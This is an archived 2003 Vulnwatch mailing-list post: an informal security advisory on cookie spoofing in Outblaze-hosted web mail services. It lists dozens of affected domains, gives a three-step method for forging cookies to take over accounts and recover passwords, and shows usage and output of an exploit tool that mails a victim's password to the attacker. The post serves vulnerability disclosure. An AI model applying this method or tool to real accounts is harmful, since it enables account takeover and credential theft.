Vulnwatch mailing list archives
++Danger++ Outblaze Web based e-mail that is exposed in very dangerous state !!!
From: "dong-h0un U" <xploit () hackermail com>
Date: Mon, 17 Mar 2003 15:54:50 +0800
========================================== INetCop Security Advisory #2003-0x82-014.b ========================================== * Title: ++Danger++ Outblaze Web based e-mail that is exposed in very dangerous state !!! 0x01. Description Hackermail.com (Outblaze Web based e-mail) is mail service that I use. Last week, someone hacked `xploit () hackermail com' that I'm using. (hacked several people. wow, very funny kiddies !) And, I looked for the first step. It was problem in Outblaze Web based e-mail service. I also, could find again my mail password. hehe It because of cookie such as fool! Many mail users get overridden. I yet, did not try conversation with mail hacking criminal. However, It's sure that I find funny and interesting truth thanks to. ++Update Advisory version #2003-0x82-014.b++ I know interesting truth still more. This can hack almost Outblaze Web based e-mail service !!! w00h00~! 0x02. Vulnerable Sites Vendor site: ? http://www.outblaze.com (Desire to visit.) +------------------------------+----------------+---------------------------+ | mail server | vulnerable? | exploitable? | +------------------------------+----------------+---------------------------+ | http://www.amrer.net | vulnerable | exploitable | | http://www.amuro.net | vulnerable | exploitable | | http://www.amuromail.com | vulnerable | exploitable | | http://www.astroboymail.com | vulnerable | exploitable | | http://www.dbzmail.com | vulnerable | exploitable | | http://www.doramail.com | vulnerable | exploitable | | http://www.glay.org | vulnerable | exploitable | | http://www.jpopmail.com | vulnerable | exploitable | | http://www.keromail.com | vulnerable | exploitable | | http://www.kichimail.com | vulnerable | exploitable | | http://www.norikomail.com | vulnerable | exploitable | | http://www.otakumail.com | vulnerable | exploitable | | http://www.smapxsmap.net | vulnerable | - Don't change hint | | http://www.uymail.com | vulnerable | exploitable | | http://www.yyhmail.com | vulnerable | exploitable | | http://mail.china139.com | vulnerable | exploitable | | http://www.mailasia.com | vulnerable | exploitable | | http://www.aaronkwok.net | vulnerable | exploitable | | http://www.bsdmail.org | vulnerable | exploitable | | http://www.bsdmail.com | vulnerable | exploitable | | http://www.ezagenda.com | vulnerable | - Don't change hint | | http://www.fastermail.com | vulnerable | - Don't change hint | | http://www.wongfaye.com | vulnerable | exploitable | | http://www.graffiti.net | vulnerable | exploitable | | http://www.hackermail.com | vulnerable | exploitable | | http://www.kellychen.com | vulnerable | exploitable | | http://www.leonlai.net | vulnerable | exploitable | | http://www.linuxmail.org | vulnerable | exploitable | | http://www.outblaze.net | vulnerable | exploitable | | http://www.outblaze.org | vulnerable | exploitable | | http://www.outgun.com | vulnerable | exploitable | | http://www.surfy.net | vulnerable | exploitable | | http://www.pakistans.com | vulnerable | exploitable | | http://www.jaydemail.com | vulnerable | exploitable | | http://www.joinme.com | vulnerable | exploitable | | http://www.marchmail.com | vulnerable | exploitable | | http://mail.nctta.org | vulnerable | exploitable | | http://mail.portugalnet.com | vulnerable | exploitable | | http://boardermail.com | vulnerable | exploitable | | http://www.mailpuppy.com | vulnerable | exploitable | | http://www.melodymail.com | vulnerable | - Don't change hint | | http://www.twinstarsmail.com | vulnerable | - Don't change hint | | http://www.purinmail.com | vulnerable | exploitable | | http://www.gundamfan.com | vulnerable | - Don't change hint | | http://www.slamdunkfan.com | vulnerable | - Don't change hint | | http://www.movemail.com | vulnerable | - Don't change hint | | http://startvclub.com | vulnerable | - Don't change hint | | http://ultrapostman.com | vulnerable | exploitable | | http://mail.sailormoon.com | vulnerable | exploitable | +------------------------------+----------------+---------------------------+ * We confirmed already and all. If there is other places that use Outblaze, inform. 0x03. Exploit Cookie Spooing Exploit method is very simple. 1. First, read user's cookie. 2. Change mail id, domain, etc... cookie informations. 3. And, deceive it. hehe, it's very easy? Its application is very simple. Hack user's information page. (information correction) Thereafter, can find out password. yah0o ~! I exhibited exploit to my friends not long ago. The following is my xploit execution result. bash$ ./0x82-eat_outblaze_0dayxpl Outblaze Web based e-mail User Cookie Spoofing 0day exploit by Xpl017Elz. Usage: ./0x82-eat_outblaze_0dayxpl -option [argument] -t [target num] - target mail server. -i [mail id] - target mail id. -m [mail addr] - your mail address. -h - help information. Select target mail number: {0} amrer.net {1} amuro.net {2} amuromail.com {3} astroboymail.com {4} dbzmail.com {5} doramail.com {6} glay.org {7} jpopmail.com {8} keromail.com {9} kichimail.com {10} norikomail.com {11} otakumail.com {12} smapxsmap.net {13} uymail.com {14} yyhmail.com {15} china139.com {16} mailasia.com {17} aaronkwok.net {18} bsdmail.com {19} bsdmail.org {20} ezagenda.com {21} fastermail.com {22} wongfaye.com {23} graffiti.net {24} hackermail.com {25} kellychen.com {26} leonlai.net {27} linuxmail.org {28} outblaze.net {29} outblaze.org {30} outgun.com {31} surfy.net {32} pakistans.com {33} jaydemail.com {34} joinme.com {35} marchmail.com {36} nctta.org {37} portugalnet.com {38} boardermail.com {39} mailpuppy.com {40} melodymail.com {41} twinstarsmail.com {42} purinmail.com {43} gundamfan.com {44} slamdunkfan.com {45} movemail.com {46} startvclub.com {47} ultrapostman.com {48} sailormoon.com Example> ./0x82-eat_outblaze_0dayxpl -t 0 -i admin -m your_mail () mail com bash$ bash$ ./0x82-eat_outblaze_0dayxpl -t 24 -i tester -m attacker () testmail com Outblaze Web based e-mail User Cookie Spoofing 0day exploit by Xpl017Elz. ============================================================ ++ Cookie Spoofing Brute-force mode. ++ [*] Connected to http://www.hackermail.com/. [*] target mail address: tester () hackermail com. [*] Wait, getting password: This is your password: Happy-Exploit [*] Password sent out by your e-mail (attacker () testmail com). ============================================================ bash$ This code may have spewed password if put ID that want to attack. Also, password is sent out your mail. 0x04. Patch -- There is document about cookie security very much. We notified this truth to Outblaze Web based e-mail solution before. Soon is going to become patch. -- Thank you. P.S: Sorry, for my poor english. -- By "dong-houn yoU" (Xpl017Elz), in INetCop(c) Security. MSN & E-mail: szoahc(at)hotmail(dot)com, xploit(at)hackermail(dot)com INetCop Security Home: http://www.inetcop.org (Korean hacking game) My World: http://x82.i21c.net & http://x82.inetcop.org GPG public key: http://x82.inetcop.org/h0me/pr0file/x82.k3y -- -- _______________________________________________ Get your free email from http://www.hackermail.com Powered by Outblaze
Current thread:
- ++Danger++ Outblaze Web based e-mail that is exposed in very dangerous state !!! dong-h0un U (Mar 17)